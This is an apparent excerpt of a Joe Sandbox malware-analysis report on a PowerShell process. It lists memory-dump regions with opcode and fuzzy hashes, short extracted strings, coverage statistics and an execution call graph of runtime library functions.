                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cc7cb5a63f39479c880f3b4a918bd22785f5f8cba3afcd02639a0f555fc67483
                                                                                                    • Instruction ID: 3b9e26592f20e4d8e3f7b6f92890d3cfdbfcdcff9ffecacf88f6bec9d3401642
                                                                                                    • Opcode Fuzzy Hash: cc7cb5a63f39479c880f3b4a918bd22785f5f8cba3afcd02639a0f555fc67483
                                                                                                    • Instruction Fuzzy Hash: 81E0D82170A3D20BAB13B2BC2C102BE6FDA4FC605871910FECA84CB243D945EC0683B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c6bc8454d17b4abd49da7403d8d5b16e19c108648159feb016e83fdee24403e3
                                                                                                    • Instruction ID: 716ef6502fe340e5d0930c441bfbb04bd3e7c1f7ef6699d332ac480b9103b431
                                                                                                    • Opcode Fuzzy Hash: c6bc8454d17b4abd49da7403d8d5b16e19c108648159feb016e83fdee24403e3
                                                                                                    • Instruction Fuzzy Hash: DCE02B31F05A80EBC718866CD8418E8BFB1DFC8220F0584BEDD86AB721D972691EC791
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 34ed8b8e216dabd165e495658ad8e9c117a31cf531f45b8c0f086e646a17a1fb
                                                                                                    • Instruction ID: ba6876b003c6dd569d19340f038cff89ebeb1e5c1b40227dce046f2a8b8aa84c
                                                                                                    • Opcode Fuzzy Hash: 34ed8b8e216dabd165e495658ad8e9c117a31cf531f45b8c0f086e646a17a1fb
                                                                                                    • Instruction Fuzzy Hash: 35F0EC3070E6914FC70637B894585EE3F61EBC1225F09016FD60BCB283CF68080587D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e122f4d2012cfe8a7f343fe43118138f886de995ea856abafda4092f1ebde31
                                                                                                    • Instruction ID: 787b098dfff7c9307768cc20d0016ab79ad1a048fc69ab90619528073749adb8
                                                                                                    • Opcode Fuzzy Hash: 6e122f4d2012cfe8a7f343fe43118138f886de995ea856abafda4092f1ebde31
                                                                                                    • Instruction Fuzzy Hash: D9F0A770D042869EC751DFFD884515AFFE09F0A114B2482EFC944DB242FE719502C7D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b57fa5f4c9da43e60555d07ec4b5dff0b1410f577b0179dff4fc69feea522e84
                                                                                                    • Instruction ID: 01f37818e5472af801db7bdf35abac274b07013f04770f7fee035cbb18841512
                                                                                                    • Opcode Fuzzy Hash: b57fa5f4c9da43e60555d07ec4b5dff0b1410f577b0179dff4fc69feea522e84
                                                                                                    • Instruction Fuzzy Hash: B6F06D70A053044BD364AFB8D89C39A7BE5FB44310F00442DD64EC3240DB3968808B90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a41f5a1dc69b4acd062e7bc62984bd04ba2d03df091f4353a5298fd27220568b
                                                                                                    • Instruction ID: 124597f2b5de928fa4d67b61170ad74491eb9f50f2ce6a1dfcabba2119adeec0
                                                                                                    • Opcode Fuzzy Hash: a41f5a1dc69b4acd062e7bc62984bd04ba2d03df091f4353a5298fd27220568b
                                                                                                    • Instruction Fuzzy Hash: CEE0CD2675E3D50F5717513E68204AA3FA78BC712030E84FED588CF212CC514C0A4351
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a021245332bb9349f1f6d9c888b27dd155c3a298d66b94e9d0512184d3c06344
                                                                                                    • Instruction ID: ce1edd6f0c3cc9c01c546bd83d730378a91f04d68c74eaec37ce9c3044367dd2
                                                                                                    • Opcode Fuzzy Hash: a021245332bb9349f1f6d9c888b27dd155c3a298d66b94e9d0512184d3c06344
                                                                                                    • Instruction Fuzzy Hash: 30E0263170961047CB0837B8A80C2AE7A96FBC4725F04002EDA0B83342CF78281183E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 56a57ea50d2f516570b3e2e36163cbbb520b52640527a8f453a82bec04d7eee1
                                                                                                    • Instruction ID: 78ad544638a0cefc1f4cc4f57d3b9c428d3eeb7faad62c7f4e579f3ec5003900
                                                                                                    • Opcode Fuzzy Hash: 56a57ea50d2f516570b3e2e36163cbbb520b52640527a8f453a82bec04d7eee1
                                                                                                    • Instruction Fuzzy Hash: 3DD0A712701226073A5472FE2C0077BA5CF9FC44A970510769B48C3342FE48FC0243F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2661c30b6a6b244a67cc0f8c194d280e3c975a6e85b2800953b76fa490f9e26f
                                                                                                    • Instruction ID: 9d3c1553f086a7678a32fbfb3008e98c1ce1005750cfdc1e2b541faecd68736e
                                                                                                    • Opcode Fuzzy Hash: 2661c30b6a6b244a67cc0f8c194d280e3c975a6e85b2800953b76fa490f9e26f
                                                                                                    • Instruction Fuzzy Hash: 76E0C231701A141782296A5EAC00C9FBBEEDFC5675310403EE10AC7384DE64FD0587E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                    • Instruction ID: b2638daad95a4c3d2245b196cb30c0c881ed89d4ea4eb7410d59d0376c112fb4
                                                                                                    • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                    • Instruction Fuzzy Hash: E3E08631B0011497CB08959DD8504D9FBA5DBCC220F04C47ADE0AA7750EA32791A86E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 966f16f5cf8c7315b601919da1c56da275ed3dc82a174067f57d1c3d23542bc0
                                                                                                    • Instruction ID: 3b2b9fffb390b582f10936af13ae285dbaf23678f2521072266f33bf0470d984
                                                                                                    • Opcode Fuzzy Hash: 966f16f5cf8c7315b601919da1c56da275ed3dc82a174067f57d1c3d23542bc0
                                                                                                    • Instruction Fuzzy Hash: A1E0D830A1D28ACBCB05EBA8D4464ADBFB0EB45204B0001ADD94AD7603D7315449CF81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1567cb2e869f60515f6649b626cee87df6bbf042a539122a0f1eaa1070ce5bc6
                                                                                                    • Instruction ID: 8b0a56b21ab05bed448b8c2258097e5eae799a95635a92f7d7d6e5f78162a6b9
                                                                                                    • Opcode Fuzzy Hash: 1567cb2e869f60515f6649b626cee87df6bbf042a539122a0f1eaa1070ce5bc6
                                                                                                    • Instruction Fuzzy Hash: 7AE08631E1A146CBCB0DBBA4D95A4FDBF30FE15301B41059DD99352591EB715A4ECB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                    • Instruction ID: 708782ebd0ce472bb6979111fa1c0a9ec426172bf36d1ec8807e74be7d700642
                                                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                    • Instruction Fuzzy Hash: F0D062B0D042099F8780DFADC94156DFBF4EF49204F5085BA8919D7311F7315A128BD1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 156791aa560f69a234c18436487d47f0b4659110a7bc33c80a1191304db209e3
                                                                                                    • Instruction ID: 6483ad8a5fcb2f7c6bbf79fa816affbe76943d48ad42dd1727c336e5d8a1cb56
                                                                                                    • Opcode Fuzzy Hash: 156791aa560f69a234c18436487d47f0b4659110a7bc33c80a1191304db209e3
                                                                                                    • Instruction Fuzzy Hash: A5D067319191098BCB0CBBA5E85A4BDBB74FB14301F40416DDA1792291EB316A5ACAC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9ae1a5edd68113468ef655596c689af38e6e6836e373b3f9e64a042d6f2f2497
                                                                                                    • Instruction ID: 25488853473f988703d5b65182b27d0d6527e2428c412c1ea21013bbdd286b76
                                                                                                    • Opcode Fuzzy Hash: 9ae1a5edd68113468ef655596c689af38e6e6836e373b3f9e64a042d6f2f2497
                                                                                                    • Instruction Fuzzy Hash: 73D01734A1920E8BCB48EFA4E84686EBBB4EB44200F004169DA0A93741EB306811CBC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ab7d3b599aa9d8ab89ca81b1a728faf62252977d04482b16c9ef39bc60b8eb57
                                                                                                    • Instruction ID: 4590c8ffcb663299fe2b38114c4ef778f9668e5fc70f2d8b4a33a3dbdc65bd0d
                                                                                                    • Opcode Fuzzy Hash: ab7d3b599aa9d8ab89ca81b1a728faf62252977d04482b16c9ef39bc60b8eb57
                                                                                                    • Instruction Fuzzy Hash: CBD0923844E7C49FC7168B7895968183F605E0312830905DED8869F2B7CA76C849CB16
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 452dbca00520e635b59c845ea654b75d539d2ac244ee90156a6f84c3ad75b138
                                                                                                    • Instruction ID: 5b4ddfbce53457251d9b674b02c6019daf848e660617a72c77db7e0a5256a695
                                                                                                    • Opcode Fuzzy Hash: 452dbca00520e635b59c845ea654b75d539d2ac244ee90156a6f84c3ad75b138
                                                                                                    • Instruction Fuzzy Hash: 9FC08C1440F3C08FDF0A8B34493A8063F321E8320834B40DFC082CB872CA248809EB02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58fb756577b71de27cbfa2a4b2d2350dc10e8a7e3b00ce2ddd06197ac196d33c
                                                                                                    • Instruction ID: b72065607ac963a4f3b88bbcc045fe1659f04420a0623a5d471681fdca27fc3d
                                                                                                    • Opcode Fuzzy Hash: 58fb756577b71de27cbfa2a4b2d2350dc10e8a7e3b00ce2ddd06197ac196d33c
                                                                                                    • Instruction Fuzzy Hash: 22B092300447088FC3486F75A504C28732DAF4021538004A8E80E0B3A78F36EC84CA44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$tPjq$tPjq$#^j$$jq$$jq$$jq$dk$dk
                                                                                                    • API String ID: 0-95039864
                                                                                                    • Opcode ID: 5f541d66d9fcde9c3b12bb4a3de4d2873afd0bd9edeb3c2c171ebd2e2843af14
                                                                                                    • Instruction ID: c5eed991ea614585361f7be1502f6183f13e20ee356c76aed4ed833ea823c8e8
                                                                                                    • Opcode Fuzzy Hash: 5f541d66d9fcde9c3b12bb4a3de4d2873afd0bd9edeb3c2c171ebd2e2843af14
                                                                                                    • Instruction Fuzzy Hash: E6815AB27087068FD7148F39D85076ABBADFF85710F1484ABD945CB291DA35CE42C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: foq$4'jq$4'jq$4'jq$4'jq$rnk$rnk
                                                                                                    • API String ID: 0-1611023007
                                                                                                    • Opcode ID: 3e1379f823124a50d9060aa889366aa54274346d19d07e9e779e8d5656cf6fab
                                                                                                    • Instruction ID: 4b292b50b4a396286898411ba03b8d61df2f12bb2aec8809745ecd9145621e4f
                                                                                                    • Opcode Fuzzy Hash: 3e1379f823124a50d9060aa889366aa54274346d19d07e9e779e8d5656cf6fab
                                                                                                    • Instruction Fuzzy Hash: 0FD167B17042468FC7159B7898107AABFAAEFC2310F24C0BBD545CB292CA758D86C7E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tMnk$`kq$`kq$`kq$`kq
                                                                                                    • API String ID: 0-2490967775
                                                                                                    • Opcode ID: d34df0b3ba74e00519f971d4fab978d44f878fd36fa02738f2deada44113572f
                                                                                                    • Instruction ID: e91ad70d519bd9e31b3f906d9e451a610bce28d531e78df659203deba03dc082
                                                                                                    • Opcode Fuzzy Hash: d34df0b3ba74e00519f971d4fab978d44f878fd36fa02738f2deada44113572f
                                                                                                    • Instruction Fuzzy Hash: 52B19574E012099FDB54DFA9D980A9EFBF6FF88304F108629D819AB355DB34A905CF90
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2133403796.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tMnk$`kq$`kq$`kq$`kq
                                                                                                    • API String ID: 0-2490967775
                                                                                                    • Opcode ID: 78ae5472f0b1c2a16fb5e93166e56b251614cf52a87058027ef2bc40799bf2f1
                                                                                                    • Instruction ID: 0cdc0f518acd91ee7a8c21f238553b5ca191b78b700e5d8f7415532e4cbd3a3b
                                                                                                    • Opcode Fuzzy Hash: 78ae5472f0b1c2a16fb5e93166e56b251614cf52a87058027ef2bc40799bf2f1
                                                                                                    • Instruction Fuzzy Hash: EBB19674E012099FDB54DFA9D980A9EFBF6FF88304F108629D819AB355DB34A905CF90
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$$jq$dk$dk
                                                                                                    • API String ID: 0-1578725869
                                                                                                    • Opcode ID: 6b5d1de74242e3e3dae8f4c3d915ff1548430f22e3ddb6ea0cde50aeb9f1c8c5
                                                                                                    • Instruction ID: de779ffb6593266b9ede4dbacb37cf896b5fb7141e1f16f3cd73ea2aaf771259
                                                                                                    • Opcode Fuzzy Hash: 6b5d1de74242e3e3dae8f4c3d915ff1548430f22e3ddb6ea0cde50aeb9f1c8c5
                                                                                                    • Instruction Fuzzy Hash: 1411E9B13443869BEB38491E9854767BBAFEFC1721F24C02BE84587291CA35E945C751
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$$jq$$jq
                                                                                                    • API String ID: 0-2428501249
                                                                                                    • Opcode ID: 30d7ef015f0ffad7801c91a78977751fe367b7e317d614773718232e0d253d72
                                                                                                    • Instruction ID: 3b3b7ed5da040e85daeb5da29a113d763150ea72b650ffbc32f427049062f46d
                                                                                                    • Opcode Fuzzy Hash: 30d7ef015f0ffad7801c91a78977751fe367b7e317d614773718232e0d253d72
                                                                                                    • Instruction Fuzzy Hash: 7A2107B27543029FDB34996AAC807277BDFEBC1719F24803AD905DB281DD75C9518361
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: pi6j$pi6j$Jok$Jok
                                                                                                    • API String ID: 0-4123539841
                                                                                                    • Opcode ID: ce03d1aa2eb208bb354c107378ca256bb342f5d2200bdb1bf8883b6c782a76b1
                                                                                                    • Instruction ID: 07f54fae40523ca94d45aa9e09d4df84c50abfe57d731f1b15ed60642c55b962
                                                                                                    • Opcode Fuzzy Hash: ce03d1aa2eb208bb354c107378ca256bb342f5d2200bdb1bf8883b6c782a76b1
                                                                                                    • Instruction Fuzzy Hash: 8031D5F5904746DFDB21CF26D5847AABBBDBF02211F0880AAD8548B151D739DA84CFA2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'jq$4'jq$$jq$$jq
                                                                                                    • API String ID: 0-1496060811
                                                                                                    • Opcode ID: b78b0364fa8fac0ebbce421d940464fe4b94628a1b26f05a036e689de596bf66
                                                                                                    • Instruction ID: 1a5e556fc35b4105c2a2821e804d3a2e864a03f79e929aa200c75b3ba63a5cb7
                                                                                                    • Opcode Fuzzy Hash: b78b0364fa8fac0ebbce421d940464fe4b94628a1b26f05a036e689de596bf66
                                                                                                    • Instruction Fuzzy Hash: 0301F26134E3918FC72B522868201AAAFB79F8315073941DBC880DF2D7CD684D4A8BB3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $jq$$jq$Jok$Jok
                                                                                                    • API String ID: 0-975260283
                                                                                                    • Opcode ID: 5b7932b3d755d573a274f75ef3da36a6168585f73b18b840f8d8e87f0f17f451
                                                                                                    • Instruction ID: d0ace1c1ecc82d4ed35409912de200c04b374bc1d5ca83fed2cc77561d2695a7
                                                                                                    • Opcode Fuzzy Hash: 5b7932b3d755d573a274f75ef3da36a6168585f73b18b840f8d8e87f0f17f451
                                                                                                    • Instruction Fuzzy Hash: D501D4A528D7C14FC32346295C5029B6F6FAF8355071A41DBC580DF26BC9694E09C363
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2161370987.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ce0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tPjq$tPjq$Jok$Jok
                                                                                                    • API String ID: 0-2251078300
                                                                                                    • Opcode ID: 3e3a3c88d380cef8f8aeb878f4df52ae70198f267f1063822d40f6de7b2f7a6b
                                                                                                    • Instruction ID: e430f11ac3a1e2ec3e45b96cb3e541e9b409944419a758cfe2f796dec855ea00
                                                                                                    • Opcode Fuzzy Hash: 3e3a3c88d380cef8f8aeb878f4df52ae70198f267f1063822d40f6de7b2f7a6b
                                                                                                    • Instruction Fuzzy Hash: 66F0C8B2B8010A9BD6208A869851B77F76EEB95710F184056DA019F2C5CB72CD41C3E1

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:7.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:3.6%
                                                                                                    Total number of Nodes:1835
                                                                                                    Total number of Limit Nodes:111
                                                                                                    execution_graph 67902 7ff75a6b0af0 67903 7ff75a6b0b08 67902->67903 67907 7ff75a6b0b14 ctype 67902->67907 67904 7ff75a6b0b25 ctype 67905 7ff75a6b0c5e 67905->67904 67908 7ff75a707a44 _fread_nolock 87 API calls 67905->67908 67907->67904 67907->67905 67909 7ff75a707a44 67907->67909 67908->67904 67912 7ff75a707a64 67909->67912 67913 7ff75a707a8e 67912->67913 67914 7ff75a707a5c 67912->67914 67913->67914 67915 7ff75a707a9d __scrt_get_show_window_mode 67913->67915 67916 7ff75a707ada 67913->67916 67914->67907 67926 7ff75a704e68 11 API calls _get_daylight 67915->67926 67925 7ff75a704934 EnterCriticalSection 67916->67925 67921 7ff75a707ab2 67927 7ff75a708234 78 API calls _invalid_parameter_noinfo 67921->67927 67926->67921 67927->67914 67928 7ff75a6a7633 67934 7ff75a69da40 67928->67934 67930 7ff75a6a7666 FindNextFileW 67931 7ff75a6a7684 67930->67931 67939 7ff75a71e860 67931->67939 67935 7ff75a69da58 67934->67935 67936 7ff75a69da81 _Receive_impl 67934->67936 67935->67936 67948 7ff75a708254 67935->67948 67936->67930 67940 7ff75a71e869 67939->67940 67941 7ff75a71ec3c IsProcessorFeaturePresent 67940->67941 67942 7ff75a6a76ab 67940->67942 67943 7ff75a71ec54 67941->67943 67959 7ff75a71ee34 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 67943->67959 67945 7ff75a71ec67 67960 7ff75a71ec08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 67945->67960 67953 7ff75a7080cc 78 API calls _invalid_parameter_noinfo 67948->67953 67950 7ff75a70826d 67954 7ff75a708284 IsProcessorFeaturePresent 67950->67954 67953->67950 67955 7ff75a708297 67954->67955 67958 7ff75a707f68 14 API calls 3 library calls 67955->67958 67957 7ff75a7082b2 GetCurrentProcess TerminateProcess 67958->67957 67959->67945 67961 7ff75a6bd8d4 67962 7ff75a6bd625 67961->67962 67964 7ff75a6bd639 67961->67964 67967 7ff75a6b8d10 67962->67967 67982 7ff75a6be200 67964->67982 67966 7ff75a6bd5b0 67968 7ff75a6b8e65 67967->67968 67972 7ff75a6b8d3f 67967->67972 68008 7ff75a69b8e0 82 API calls 67968->68008 67969 7ff75a6b8da4 67999 7ff75a71e888 67969->67999 67971 7ff75a6b8e6a 68009 7ff75a69b820 82 API calls 2 library calls 67971->68009 67972->67969 67975 7ff75a6b8dd3 67972->67975 67976 7ff75a6b8d97 67972->67976 67979 7ff75a6b8d8a ctype 67972->67979 67977 7ff75a71e888 std::_Facet_Register 82 API calls 67975->67977 67976->67969 67976->67971 67977->67979 67978 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 67980 7ff75a6b8e76 67978->67980 67979->67978 67981 7ff75a6b8e26 ctype _Receive_impl 67979->67981 67981->67964 67983 7ff75a6be223 67982->67983 67986 7ff75a6be21d 67982->67986 67984 7ff75a6be23a 67983->67984 68021 7ff75a6b0ca0 67983->68021 67984->67986 67988 7ff75a6be2d4 67984->67988 67985 7ff75a6be2a7 67985->67966 67986->67985 68042 7ff75a6c9fb0 67986->68042 68056 7ff75a69cdc0 82 API calls 67988->68056 67990 7ff75a6be316 68057 7ff75a720e88 67990->68057 67992 7ff75a6be327 67993 7ff75a6b8d10 82 API calls 67992->67993 67996 7ff75a6be355 67992->67996 67993->67996 